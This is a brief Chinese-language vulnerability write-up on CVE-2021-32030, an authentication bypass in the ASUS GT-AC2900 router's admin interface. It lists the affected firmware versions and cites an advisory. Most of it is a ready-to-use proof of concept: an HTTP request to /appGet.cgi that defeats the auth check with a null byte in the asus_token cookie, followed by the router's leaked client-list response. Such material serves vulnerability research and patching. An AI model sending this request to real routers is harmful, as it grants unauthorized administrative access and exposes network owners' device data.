# 华硕 GT-AC2900 身份验证绕过 CVE-2021-32030

## 漏洞描述

ASUS GT-AC2900管理员应用程序在处理未经身份验证的用户的远程输入时，容易受到身份验证绕过漏洞的攻击，从而导致对管理员界面的未经授权的访问。

参考链接：

- https://github.com/atredispartners/advisories/blob/master/ATREDIS-2020-0010.md

## 漏洞影响

```
ASUS GT-AC2900韧体版本9.0.0.4.386.41994（测试版）
ASUS GT-AC2900韧体版本3.0.0.4.386.41793（最新生产）
```

## 漏洞复现

通过在auth_check添加空字符进行绕过身份验证。

poc：

```
GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1
Host: 192.168.1.107:8443
Content-Length: 0
User-Agent: asusrouter--
Connection: close
Referer: https://192.168.1.107:8443/
Cookie: asus_token=\0Invalid; clickedItem_tab=0

HTTP/1.0 200 OK
Server: httpd/2.0
Content-Type: application/json;charset=UTF-8
Connection: close

{
"get_cfg_clientlist":[{"alias":"24:4B:FE:64:37:10","model_name":"GT-AC2900","ui_model_name":"GT-AC2900","fwver":"3.0.0.4.386_41793-gdb31cdc","newfwver":"","ip":"192.168.50.1","mac":"24:4B:FE:64:37:10","online":"1","ap2g":"24:4B:FE:64:37:10","ap5g":"24:4B:FE:64:37:14","ap5g1":"","apdwb":"","wired_mac":[
...
...
}
```